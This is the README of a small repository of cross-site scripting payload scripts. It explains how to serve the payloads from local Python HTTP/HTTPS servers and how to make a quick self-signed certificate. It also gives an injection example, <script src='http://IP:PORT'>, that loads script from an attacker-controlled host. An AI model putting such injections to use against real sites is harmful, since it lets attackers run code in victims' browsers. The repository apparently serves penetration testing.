#+OPTIONS: toc:nil num:nil
#+PROPERTY: header-args :tangle yes :exports both :eval no-export :results output
#+TITLE: xsshop
I keep writing the same scripts when I discover =xss= in an application, so I decided to make this repo to 'hold' my scripts.

** Typical Usage
   I've included =python= web servers for both =http= and =https= in the servers directory, when running these scripts they  change directory to the payloads directory and then serve the files.
   
   For the =https= server you need to generate or use a certificate like so.
   #+begin_src shell
     openssl req -new -x509 -keyout l33t_key.pem -out l33t.pem -days 1 -nodes
   #+end_src

   
   Then change the =protocol=, =server= and =port= variables in the payload you want to use then include the URL in your payload e.g ~<script src="http://IP:PORT">~ 

   Or just use [[https://github.com/sc0tfree/updog][updog]].
